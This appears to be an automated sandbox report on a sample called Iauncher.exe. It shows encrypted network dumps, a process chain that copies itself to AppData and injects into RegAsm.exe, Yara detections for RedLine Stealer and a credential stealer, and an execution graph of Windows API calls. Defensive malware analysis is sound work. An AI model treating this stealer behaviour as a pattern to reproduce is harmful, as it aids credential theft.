                                                                                                                                                                            2024-05-01 18:46:09 UTC1369INData Raw: c6 9f a5 96 d8 48 c7 6a 33 49 f3 69 73 05 50 e3 ac 15 5e 1f bd 62 69 6c 07 c9 39 1c e9 a8 89 4c 84 a1 d0 ee 81 a9 77 37 ae bb 57 d0 a9 54 d7 6b 97 55 1b f2 36 64 6d 3d 35 eb 8b be 91 35 26 83 ec 7d f4 35 ee d4 8c 31 a2 dd 03 b3 df 6e 28 a2 82 ce f9 2c 29 63 e2 11 60 dc 2a dd 53 d4 42 2b b9 c6 e6 9b d9 29 2d 6c 6c b0 72 f2 82 fe 56 5e 4a 7b 23 1b e5 4e 5b 7f ab f9 8d 3c 78 db e6 85 1f 71 61 9f e6 89 06 4c 5e 9a c9 cc c7 5e 1f 0e d2 7f f7 42 77 c8 63 dd e1 90 37 32 a6 06 15 05 b6 e8 9f 53 15 23 ac 8f f4 c5 6c 5f b9 ca 3a bb 48 f6 c2 db 78 7d 85 cd a7 df 6d 5b 42 5f f9 8c 2d 4e 60 07 44 3d 26 fe 47 37 97 1b 6b 0e 50 21 5c e6 43 ca 27 e2 a4 53 e3 04 6c 33 66 53 c9 f9 18 fb 49 4c 8e 01 de 26 c0 38 29 e5 e1 bb 0e 46 7a 18 ca 63 7b 8a 32 3e d7 75 04 c0 22 ef 36
                                                                                                                                                                            Data Ascii: Hj3IisP^bil9Lw7WTkU6dm=55&}51n(,)c`*SB+)-llrV^J{#N[<xqaL^^Bwc72S#l_:Hx}m[B_-N`D=&G7kP!\C'Sl3fSIL&8)Fzc{2>u"6
                                                                                                                                                                            2024-05-01 18:46:09 UTC1369INData Raw: 7d 6e 5e 50 17 9b 1e 86 86 04 39 b0 9b 5e f9 2f 5d 6f 6c 38 c4 49 6b 95 e5 94 63 6a 58 1a 08 9e de b9 ce 7d 01 be 56 89 ea e2 c2 f7 d5 4a 1a 5f 52 ea 4d 5e 52 aa 4d ef 48 2c 29 0d a6 47 fd 64 07 ad 82 8e b8 6d f9 d5 b1 25 25 00 21 50 70 25 4d 68 6e b1 25 a5 68 fa 3a 6b fa 71 3f bd e8 6b d4 0f bb 69 c3 21 a8 72 3b 3d 7b 26 37 a2 c0 91 4a a1 02 65 e8 eb 6c ae 1d 2b 6f 40 51 ba da ca 44 e9 b9 20 4a a7 9d 22 4a e7 ec d0 e6 7a 0b 35 be a6 dc e7 a5 f7 7f 8d 7b b9 65 9b 8f de 69 36 14 78 10 aa 51 a2 8b 49 eb 4b 98 b8 fe fa 3f 0c a9 da ca d1 e7 8f c6 94 05 6c 3c 55 e8 70 f3 5c b7 b1 dc a0 34 58 4d f2 78 52 26 04 26 d5 4b a8 8b 5c f5 4f 5d 8f 4c 00 aa d3 4a 1e 77 a9 e3 76 8d af 41 ac 01 b1 1c 05 f4 6d f5 b1 75 8a 72 52 6e 73 95 db 57 4d 43 c9 59 2b 32 a9 85 36 40
                                                                                                                                                                            Data Ascii: }n^P9^/]ol8IkcjX}VJ_RM^RMH,)Gdm%%!Pp%Mhn%h:kq?ki!r;={&7Jel+o@QD J"Jz5{ei6xQIK?l<Up\4XMxR&&K\O]LJwvAmurRnsWMCY+26@
                                                                                                                                                                            2024-05-01 18:46:09 UTC1369INData Raw: 03 a2 c1 f7 ec e1 35 b5 31 2c d8 be 94 07 8f c3 d8 c4 fc e8 9f 90 b1 9f 87 af 48 96 21 ba e3 38 22 84 5d 97 ee c4 ed dd d5 42 c0 5c 8f cb 1d aa 85 3e 52 07 8f 05 3c d6 5e 3a 07 b4 cf 07 10 e0 5e fe 65 3c 5c 40 fa 3a 16 08 38 36 71 a9 32 62 a5 b7 41 9c 72 8b 80 f0 f4 59 84 03 89 7d 81 15 12 8e f5 d2 c2 5f e2 de a6 05 56 ec d3 8c d7 b2 65 e2 fe c0 6c c8 f3 2f 0b 58 87 a7 d7 e1 38 48 a3 8f e0 a3 84 a7 cb 31 8b 52 c1 19 0a 76 89 8f 84 d4 12 01 26 a1 39 15 34 85 ed 40 77 86 ea f2 f9 55 0d 99 e4 3d d2 de fa b9 45 e9 4e 13 5f 5a 74 95 55 7c be d5 19 6a 86 97 62 d0 ea 01 b5 f5 1f 2c c3 1d 69 06 1d 88 c7 0e c3 c1 e7 ec cf 5f 21 48 93 ea 88 c7 fa 8a 8e 66 59 57 db 9a 9c 66 93 33 e4 8e cc d1 2a 87 a0 f7 2f f1 c1 34 59 1e 30 69 65 56 60 c2 b9 fa 24 c1 0d bc 20 24 a5
                                                                                                                                                                            Data Ascii: 51,H!8"]B\>R<^:^e<\@:86q2bArY}_Vel/X8H1Rv&94@wU=EN_ZtU|jb,i_!HfYWf3*/4Y0ieV`$ $
                                                                                                                                                                            2024-05-01 18:46:09 UTC1369INData Raw: 3e fa c5 f8 ff 4d 35 b6 db 46 aa 01 e5 3d 39 fe db ab 01 fc 5e 19 14 57 17 35 ce f3 be 0a 22 8f 94 0f 33 b4 1d 64 3d db 02 94 41 8a 2d 03 96 7f 6a 25 82 a5 55 e9 8e 92 3d a4 d3 d5 07 7a 7d 9f eb 1f 6b cc e4 ad 72 dc e5 fa 13 66 71 b1 d5 d6 18 92 8b d2 3b 2b d9 1c 0c 43 4d b9 17 74 fd 1b 1a ef 9d cf 49 d7 13 cb 9b c8 29 fd 64 85 35 c1 b8 de d2 df ab 73 45 a5 95 e4 de 3c 94 85 b3 35 cf 7e dc a3 48 76 79 71 ab b3 b6 c0 ed 1d e1 70 ce ae 9c 56 69 3a 0a 03 67 a3 30 20 cf 6b fe c1 fc 2d 26 e0 ee b5 35 ce b7 97 d1 36 1b 6e 33 80 30 22 ef 87 c4 39 7d d2 44 7d d5 22 1f 2e 84 fe e4 19 86 a6 ab 4f 1e 83 a8 80 c8 14 e9 9c 13 8a 6c 47 be c8 6c ef 68 77 5a 63 23 ed 39 61 e0 91 2e 8f 75 a5 05 78 05 ae e0 42 7d 45 cd 7e 56 4e 1f d9 65 69 cb 79 ab b0 dc bb 84 3e 31 97 c9
                                                                                                                                                                            Data Ascii: >M5F=9^W5"3d=A-j%U=z}krfq;+CMtI)d5sE<5~HvyqpVi:g0 k-&56n30"9}D}".OlGlhwZc#9a.uxB}E~VNeiy>1
                                                                                                                                                                            2024-05-01 18:46:09 UTC1369INData Raw: 6f 2f 99 6f ca f7 ec 14 9b 6e d2 19 d5 7b 96 c1 93 e9 32 31 6b d7 29 04 42 fe 84 24 39 1f b8 53 be b0 6a 3a 10 4c 4a ad cb bf 7b 18 98 40 c9 6c 9f 0e 7a 76 96 c2 0d d3 f5 c3 48 41 0f 23 4c 01 02 5d a9 6c cc e3 e4 69 80 87 e6 19 86 2a 0f 7b 29 17 c7 37 a5 0e 74 e4 b3 20 a5 76 5d 41 be 20 59 eb d4 cb 80 96 ef 82 10 1d f9 77 1d 9e 5b 5f 16 37 d3 c6 18 a7 3f 4b 2b 29 c8 37 cb 53 95 06 bb 49 b6 b3 ac c7 21 93 a8 b6 29 ed c3 ca 3b 3a 6e 3e b0 41 00 2b bf 8e fe 65 40 d7 a1 9c 6a d2 9e 1e 96 53 31 91 64 d7 65 7b 85 0f d0 a1 6d bf 62 24 81 06 9b 87 2c 0b 83 e6 ff 22 66 84 ca 01 3c 2e 38 6e f4 c6 35 6e b2 71 21 29 8b 92 ca 21 e5 26 81 53 6e b2 72 6c 33 9f ba c2 a6 ae b5 47 a6 a2 6d 4a d0 95 52 5e 8f 47 2b 37 d9 e0 cf ce b1 0a d8 b1 02 23 30 ce 2e b5 54 50 4b ad 6a
                                                                                                                                                                            Data Ascii: o/on{21k)B$9Sj:LJ{@lzvHA#L]li*{)7t v]A Yw[_7?K+)7SI!);:n>A+e@jS1de{mb$,"f<.8n5nq!)!&Snrl3GmJR^G+7#0.TPKj


                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:20:45:58
                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Iauncher.exe"
                                                                                                                                                                            Imagebase:0x480000
                                                                                                                                                                            File size:732'672 bytes
                                                                                                                                                                            MD5 hash:E69FEB7FD40F408A088D879BE323F37A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1618643197.0000000000482000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:2
                                                                                                                                                                            Start time:20:46:08
                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"
                                                                                                                                                                            Imagebase:0xf10000
                                                                                                                                                                            File size:505'344 bytes
                                                                                                                                                                            MD5 hash:D79977A15EB010C637CF9078B4EB82C8
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:20:46:08
                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:20:46:08
                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                            Imagebase:0x460000
                                                                                                                                                                            File size:65'440 bytes
                                                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Reset < >

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:12.6%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                              Signature Coverage:1.2%
                                                                                                                                                                              Total number of Nodes:668
                                                                                                                                                                              Total number of Limit Nodes:49
                                                                                                                                                                              execution_graph 70108 5cb1fc8 70109 5cb1fef 70108->70109 70110 5cb2050 70109->70110 70113 4e01d28 70109->70113 70116 4e01d17 70109->70116 70119 4e00560 70113->70119 70115 4e01d4f 70115->70110 70117 4e00560 CreateWindowExW 70116->70117 70118 4e01d4f 70116->70118 70117->70118 70118->70110 70120 4e0056b 70119->70120 70121 4e01ec1 70120->70121 70122 4e01e22 70120->70122 70126 4e01f08 70120->70126 70138 4e01f20 70120->70138 70121->70115 70122->70121 70123 4e00560 CreateWindowExW 70122->70123 70123->70122 70128 4e01f51 70126->70128 70129 4e0205e 70126->70129 70127 4e01f5d 70127->70122 70128->70127 70130 4e02042 70128->70130 70150 5cb0cba 70128->70150 70156 5cb0cc8 70128->70156 70161 5cb0ca0 70128->70161 70129->70122 70166 4e03180 70130->70166 70171 4e03170 70130->70171 70140 4e0205e 70138->70140 70142 4e01f51 70138->70142 70139 4e01f5d 70139->70122 70140->70122 70141 4e02042 70145 4e03180 CreateWindowExW 70141->70145 70146 4e03170 CreateWindowExW 70141->70146 70142->70139 70142->70141 70147 5cb0cba CreateWindowExW 70142->70147 70148 5cb0cc8 CreateWindowExW 70142->70148 70149 5cb0ca0 CreateWindowExW 70142->70149 70143 4e02051 70211 4e00590 CreateWindowExW 70143->70211 70145->70143 70146->70143 70147->70141 70148->70141 70149->70141 70151 5cb0cc3 70150->70151 70153 5cb0d04 70150->70153 70152 5cb0ced 70151->70152 70176 4e06950 70151->70176 70183 4e06940 70151->70183 70152->70130 70157 5cb0cd6 70156->70157 70158 5cb0ced 70157->70158 70159 4e06940 CreateWindowExW 70157->70159 70160 4e06950 CreateWindowExW 70157->70160 70158->70130 70159->70158 70160->70158 70162 5cb0ce4 70161->70162 70163 5cb0ca3 70161->70163 70164 4e06940 CreateWindowExW 70162->70164 70165 4e06950 CreateWindowExW 70162->70165 70163->70130 70164->70163 70165->70163 70167 4e031ab 70166->70167 70168 4e0325a 70167->70168 70200 4e03f50 70167->70200 70204 4e04060 70167->70204 70172 4e03173 70171->70172 70173 4e030e9 70171->70173 70172->70173 70174 4e03f50 CreateWindowExW 70172->70174 70175 4e04060 CreateWindowExW 70172->70175 70174->70173 70175->70173 70177 4e06960 70176->70177 70178 4e0699d 70177->70178 70179 4e01f20 CreateWindowExW 70177->70179 70181 4e01f08 CreateWindowExW 70177->70181 70190 5cbf457 70177->70190 70195 5cbf468 70177->70195 70178->70152 70179->70178 70181->70178 70184 4e06944 70183->70184 70185 4e0699d 70184->70185 70186 4e01f20 CreateWindowExW 70184->70186 70187 5cbf468 CreateWindowExW 70184->70187 70188 4e01f08 CreateWindowExW 70184->70188 70189 5cbf457 CreateWindowExW 70184->70189 70185->70152 70186->70185 70187->70185 70188->70185 70189->70185 70191 5cbf4a1 70190->70191 70192 5cbf53f 70191->70192 70193 4e01f20 CreateWindowExW 70191->70193 70194 4e01f08 CreateWindowExW 70191->70194 70193->70192 70194->70192 70196 5cbf4a1 70195->70196 70197 5cbf53f 70196->70197 70198 4e01f20 CreateWindowExW 70196->70198 70199 4e01f08 CreateWindowExW 70196->70199 70198->70197 70199->70197 70201 4e03f95 70200->70201 70201->70201 70207 4e02e50 70201->70207 70205 4e04095 70204->70205 70206 4e02e50 CreateWindowExW 70204->70206 70205->70168 70206->70205 70208 4e040b0 CreateWindowExW 70207->70208 70210 4e041d4 70208->70210 70210->70210 70211->70140 70212 744fa40 PeekMessageW 70213 744fab7 70212->70213 70704 5cbab40 70705 5cbab7a 70704->70705 70706 5cbac0b 70705->70706 70707 5cbabf6 70705->70707 70708 5cba520 3 API calls 70706->70708 70709 5cba520 3 API calls 70707->70709 70710 5cbac1a 70708->70710 70711 5cbac01 70709->70711 70740 5cb1200 70741 5cb1248 SetWindowTextW 70740->70741 70742 5cb1242 70740->70742 70743 5cb1279 70741->70743 70742->70741 70744 b65f78 70745 b65f94 70744->70745 70746 b66009 70745->70746 70747 b66017 70745->70747 70752 b66218 70745->70752 70757 5cbe6e8 70747->70757 70761 5cbe6d8 70747->70761 70753 b6623d 70752->70753 70765 b66328 70753->70765 70769 b66318 70753->70769 70758 5cbe6ea 70757->70758 70777 5cbe340 70758->70777 70762 5cbe6e8 70761->70762 70763 5cbe340 3 API calls 70762->70763 70764 b66049 70763->70764 70767 b6634f 70765->70767 70766 b6642c 70766->70766 70767->70766 70773 b65e24 70767->70773 70771 b66326 70769->70771 70770 b6642c 70770->70770 70771->70770 70772 b65e24 CreateActCtxA 70771->70772 70772->70770 70774 b673b8 CreateActCtxA 70773->70774 70776 b6747b 70774->70776 70779 5cbe34b 70777->70779 70781 5cbe37c 70779->70781 70780 5cbe82c 70780->70780 70782 5cbe387 70781->70782 70783 5cbe93e 70782->70783 70786 5cb55b8 70782->70786 70791 5cb55a8 70782->70791 70783->70780 70787 5cb55ba 70786->70787 70796 5cbf0b9 70787->70796 70801 5cbf0c8 70787->70801 70788 5cb55cc 70788->70783 70792 5cb55b8 70791->70792 70794 5cbf0b9 3 API calls 70792->70794 70795 5cbf0c8 3 API calls 70792->70795 70793 5cb55cc 70793->70783 70794->70793 70795->70793 70797 5cbf0ee 70796->70797 70798 5cbf102 70797->70798 70806 4e00618 70797->70806 70813 4e005e8 70797->70813 70798->70788 70802 5cbf0ee 70801->70802 70803 5cbf102 70802->70803 70804 4e005e8 2 API calls 70802->70804 70805 4e00618 2 API calls 70802->70805 70803->70788 70804->70803 70805->70803 70807 4e0061a 70806->70807 70810 4e00717 70807->70810 70811 4e06940 CreateWindowExW 70807->70811 70812 4e06950 CreateWindowExW 70807->70812 70808 4e006be 70809 4e00712 KiUserCallbackDispatcher 70808->70809 70809->70810 70811->70808 70812->70808 70814 4e005ed 70813->70814 70817 4e00717 70814->70817 70818 4e06940 CreateWindowExW 70814->70818 70819 4e06950 CreateWindowExW 70814->70819 70815 4e006be 70816 4e00712 KiUserCallbackDispatcher 70815->70816 70816->70817 70818->70815 70819->70815 70214 7449c4b 70215 7449c5e 70214->70215 70219 7449dc2 70215->70219 70222 7449dc8 PostMessageW 70215->70222 70216 7449c81 70220 7449dc8 PostMessageW 70219->70220 70221 7449e34 70220->70221 70221->70216 70223 7449e34 70222->70223 70223->70216 70388 5cc009f 70390 5cc00af 70388->70390 70389 5cc00e5 70390->70389 70395 5cb0a80 70390->70395 70399 5cb0a70 70390->70399 70404 5cb0a38 70390->70404 70391 5cc3088 70396 5cb0a95 70395->70396 70397 5cb0aad 70396->70397 70409 5cb0af2 70396->70409 70397->70391 70400 5cb0a73 70399->70400 70401 5cb0ab4 70399->70401 70402 5cb0aad 70400->70402 70403 5cb0af2 CreateWindowExW 70400->70403 70401->70391 70402->70391 70403->70402 70405 5cb0a7c 70404->70405 70406 5cb0a3b 70404->70406 70407 5cb0aad 70405->70407 70408 5cb0af2 CreateWindowExW 70405->70408 70406->70391 70407->70391 70408->70407 70410 5cb0b3c 70409->70410 70412 5cb0afb 70409->70412 70416 5cb0b38 70410->70416 70426 5cb0b62 70410->70426 70431 5cb0b70 70410->70431 70411 5cb0b58 70411->70397 70412->70397 70417 5cb0b3b 70416->70417 70418 5cb0b7c 70416->70418 70421 5cb0b38 CreateWindowExW 70417->70421 70422 5cb0b62 CreateWindowExW 70417->70422 70423 5cb0b70 CreateWindowExW 70417->70423 70420 5cb0b92 70418->70420 70436 5cb0c18 70418->70436 70440 5cb0c08 70418->70440 70419 5cb0b58 70419->70411 70420->70411 70421->70419 70422->70419 70423->70419 70427 5cb0b6b 70426->70427 70428 5cb0b92 70426->70428 70427->70428 70429 5cb0c08 CreateWindowExW 70427->70429 70430 5cb0c18 CreateWindowExW 70427->70430 70428->70411 70429->70428 70430->70428 70432 5cb0b7c 70431->70432 70433 5cb0b92 70432->70433 70434 5cb0c08 CreateWindowExW 70432->70434 70435 5cb0c18 CreateWindowExW 70432->70435 70433->70411 70434->70433 70435->70433 70438 4e01f20 CreateWindowExW 70436->70438 70439 4e01f08 CreateWindowExW 70436->70439 70437 5cb0c45 70438->70437 70439->70437 70441 5cb0c18 70440->70441 70443 4e01f20 CreateWindowExW 70441->70443 70444 4e01f08 CreateWindowExW 70441->70444 70442 5cb0c45 70443->70442 70444->70442 70224 7440450 70225 7440460 70224->70225 70229 5cb179a 70225->70229 70232 5cb17a0 SendMessageW 70225->70232 70226 7440481 70230 5cb17a0 SendMessageW 70229->70230 70231 5cb180c 70230->70231 70231->70226 70233 5cb180c 70232->70233 70233->70226 70445 7441210 70446 7441220 70445->70446 70449 4e042c8 SetWindowLongW 70446->70449 70450 4e042b7 70446->70450 70447 7441232 70449->70447 70451 4e04326 SetWindowLongW 70450->70451 70452 4e042c6 70450->70452 70453 4e04364 70451->70453 70454 4e042e0 70452->70454 70455 4e02e8c SetWindowLongW 70452->70455 70453->70447 70454->70447 70455->70454 70234 b6d7a0 70235 b6d7e2 70234->70235 70236 b6d7e8 GetModuleHandleW 70234->70236 70235->70236 70237 b6d815 70236->70237 70820 7920848 DispatchMessageW 70821 79208b4 70820->70821 70822 5cb1510 70823 5cb1537 70822->70823 70824 5cb1520 70822->70824 70826 5cb1568 70823->70826 70827 5cb1574 70826->70827 70828 5cb157a 70827->70828 70832 5cb1768 70827->70832 70837 5cb175a 70827->70837 70828->70824 70829 5cb1594 70829->70824 70833 5cb1778 70832->70833 70835 5cb179a SendMessageW 70833->70835 70836 5cb17a0 SendMessageW 70833->70836 70834 5cb1789 70834->70829 70835->70834 70836->70834 70838 5cb1768 70837->70838 70840 5cb179a SendMessageW 70838->70840 70841 5cb17a0 SendMessageW 70838->70841 70839 5cb1789 70839->70829 70840->70839 70841->70839 70842 744a398 70843 744a3c5 70842->70843 70844 744a3b2 70842->70844 70855 74478a4 70843->70855 70850 7447894 70844->70850 70847 744a40b 70848 744a3da 70848->70847 70849 7447894 OleInitialize 70848->70849 70849->70847 70851 744789f 70850->70851 70852 744a436 70851->70852 70860 744a460 70851->70860 70866 744a470 70851->70866 70852->70843 70857 74478af 70855->70857 70856 744aa4e 70856->70848 70857->70856 70879 744c428 70857->70879 70883 744c418 70857->70883 70861 744a778 70860->70861 70863 744a498 70860->70863 70861->70852 70862 744a4a1 70862->70852 70863->70862 70872 7447934 70863->70872 70865 744a4c4 70867 744a778 70866->70867 70869 744a498 70866->70869 70867->70852 70868 744a4a1 70868->70852 70869->70868 70870 7447934 OleInitialize 70869->70870 70871 744a4c4 70870->70871 70873 744793f 70872->70873 70875 744a7bb 70873->70875 70876 7447950 70873->70876 70875->70865 70877 744a7f0 OleInitialize 70876->70877 70878 744a854 70877->70878 70878->70875 70881 744c42a 70879->70881 70880 744c4e6 70880->70856 70881->70880 70882 744c4e4 KiUserCallbackDispatcher 70881->70882 70882->70880 70885 744c428 70883->70885 70884 744c4e6 70884->70856 70885->70884 70886 744c4e4 KiUserCallbackDispatcher 70885->70886 70886->70884 70238 9f1edd0 70239 9f1ede2 70238->70239 70240 9f1ee28 70238->70240 70239->70240 70244 9f1ceec 70239->70244 70246 9f1cef7 70244->70246 70245 9f1edef 70245->70240 70249 9f1e034 70245->70249 70246->70245 70247 4e03180 CreateWindowExW 70246->70247 70248 4e03170 CreateWindowExW 70246->70248 70247->70245 70248->70245 70250 9f1ef60 SetTimer 70249->70250 70251 9f1efcc 70250->70251 70251->70240 70712 9f1c350 DispatchMessageA 70713 9f1c3bc 70712->70713 70887 74402a0 70888 74402b1 70887->70888 70890 74402d3 70888->70890 70891 5cbac28 3 API calls 70888->70891 70892 5cba520 3 API calls 70888->70892 70889 7440334 70891->70889 70892->70889 70252 5cb1de2 70253 5cb1d6c 70252->70253 70255 5cb1dea 70252->70255 70256 5cb1d81 SendMessageW 70253->70256 70257 5cb1dbc 70256->70257 70257->70252 70258 5cb12e0 70259 5cb12ec GetClassInfoW 70258->70259 70261 5cb136b 70259->70261 70456 7442028 70457 744204b 70456->70457 70460 5cb1140 70457->70460 70458 7442054 70461 5cb114b 70460->70461 70462 5cb1152 70460->70462 70461->70458 70466 5cb1170 70462->70466 70472 5cb1160 70462->70472 70463 5cb1158 70463->70458 70467 5cb117e 70466->70467 70469 5cb11a0 70466->70469 70468 5cb118c 70467->70468 70477 4e05a38 70467->70477 70482 4e05a28 70467->70482 70468->70463 70469->70463 70473 5cb1165 70472->70473 70474 5cb118c 70473->70474 70475 4e05a28 3 API calls 70473->70475 70476 4e05a38 3 API calls 70473->70476 70474->70463 70475->70474 70476->70474 70479 4e05a3a 70477->70479 70478 4e05ad5 70478->70468 70478->70478 70479->70478 70487 5cbfd28 70479->70487 70493 5cbfd18 70479->70493 70484 4e05a38 70482->70484 70483 4e05ad5 70483->70468 70484->70483 70485 5cbfd18 3 API calls 70484->70485 70486 5cbfd28 3 API calls 70484->70486 70485->70483 70486->70483 70488 5cbfd6e 70487->70488 70489 5cbfd91 70488->70489 70499 4e02fa4 70488->70499 70506 4e02f77 70488->70506 70513 4e06661 70488->70513 70489->70478 70494 5cbfd6e 70493->70494 70495 5cbfd91 70494->70495 70496 4e06661 3 API calls 70494->70496 70497 4e02fa4 3 API calls 70494->70497 70498 4e02f77 3 API calls 70494->70498 70495->70478 70496->70495 70497->70495 70498->70495 70500 4e02faf 70499->70500 70501 4e066b2 70500->70501 70502 4e0675c 70500->70502 70503 4e0670a CallWindowProcW 70501->70503 70505 4e066b9 70501->70505 70519 4e02e7c 70502->70519 70503->70505 70505->70489 70507 4e02faf 70506->70507 70508 4e066b2 70507->70508 70509 4e0675c 70507->70509 70510 4e0670a CallWindowProcW 70508->70510 70512 4e066b9 70508->70512 70511 4e02e7c 2 API calls 70509->70511 70510->70512 70511->70512 70512->70489 70514 4e066b2 70513->70514 70515 4e0675c 70513->70515 70516 4e066b9 70514->70516 70517 4e0670a CallWindowProcW 70514->70517 70518 4e02e7c 2 API calls 70515->70518 70516->70489 70517->70516 70518->70516 70520 4e02e87 70519->70520 70521 4e05029 70520->70521 70523 4e05019 70520->70523 70522 4e02fa4 3 API calls 70521->70522 70524 4e05027 70522->70524 70523->70524 70530 4e0514f 70523->70530 70535 4e0521c 70523->70535 70541 9f1eee8 70523->70541 70548 4e05150 70523->70548 70553 9f1eec0 70523->70553 70532 4e05164 70530->70532 70531 4e051f0 70531->70524 70560 4e051f8 70532->70560 70577 4e05208 70532->70577 70536 4e051da 70535->70536 70537 4e0522a 70535->70537 70539 4e051f8 3 API calls 70536->70539 70540 4e05208 3 API calls 70536->70540 70538 4e051f0 70538->70524 70539->70538 70540->70538 70542 9f1eef5 70541->70542 70544 9f1eefd 70542->70544 70545 4e06661 3 API calls 70542->70545 70546 4e02fa4 3 API calls 70542->70546 70547 4e02f77 3 API calls 70542->70547 70543 9f1ef28 70543->70524 70544->70524 70545->70543 70546->70543 70547->70543 70549 4e05164 70548->70549 70551 4e051f8 3 API calls 70549->70551 70552 4e05208 3 API calls 70549->70552 70550 4e051f0 70550->70524 70551->70550 70552->70550 70554 9f1eec5 70553->70554 70555 9f1eefd 70554->70555 70557 4e06661 3 API calls 70554->70557 70558 4e02fa4 3 API calls 70554->70558 70559 4e02f77 3 API calls 70554->70559 70555->70524 70556 9f1ef28 70556->70524 70557->70556 70558->70556 70559->70556 70561 4e05219 70560->70561 70566 4e05a28 3 API calls 70560->70566 70570 5cb1160 3 API calls 70560->70570 70573 4e05a38 3 API calls 70560->70573 70576 5cb1170 3 API calls 70560->70576 70594 5cbf74f 70560->70594 70618 74420fd 70560->70618 70624 5cb10d0 70560->70624 70628 7442190 70560->70628 70633 5cb1398 70560->70633 70639 5cb1080 70560->70639 70643 5cbf760 70560->70643 70667 5cb10c2 70560->70667 70671 7442100 70560->70671 70677 74421a0 70560->70677 70682 5cb13a8 70560->70682 70561->70531 70566->70561 70570->70561 70573->70561 70576->70561 70578 5cb13a8 3 API calls 70577->70578 70579 5cbf74f 3 API calls 70577->70579 70580 7442100 3 API calls 70577->70580 70581 74421a0 3 API calls 70577->70581 70582 4e05a28 3 API calls 70577->70582 70583 5cb10c2 3 API calls 70577->70583 70584 5cb1080 3 API calls 70577->70584 70585 5cbf760 3 API calls 70577->70585 70586 5cb1160 3 API calls 70577->70586 70587 4e05219 70577->70587 70588 5cb1398 3 API calls 70577->70588 70589 7442190 3 API calls 70577->70589 70590 4e05a38 3 API calls 70577->70590 70591 74420fd 3 API calls 70577->70591 70592 5cb10d0 3 API calls 70577->70592 70593 5cb1170 3 API calls 70577->70593 70578->70587 70579->70587 70580->70587 70581->70587 70582->70587 70583->70587 70584->70587 70585->70587 70586->70587 70587->70531 70588->70587 70589->70587 70590->70587 70591->70587 70592->70587 70593->70587 70595 5cbf779 70594->70595 70600 5cbf810 70594->70600 70596 5cbf7c0 70595->70596 70597 5cbf79a 70595->70597 70598 5cbf783 70595->70598 70601 5cbf78c 70596->70601 70602 5cbfa79 70596->70602 70603 5cbfa58 70596->70603 70604 5cbfa97 70596->70604 70611 5cbf90d 70596->70611 70617 5cbf8c6 70596->70617 70597->70601 70597->70602 70597->70603 70597->70604 70605 5cbf7b2 70597->70605 70609 5cbf9b7 70597->70609 70597->70611 70597->70617 70599 5cbf9a9 70598->70599 70598->70601 70688 5cbee58 70599->70688 70600->70601 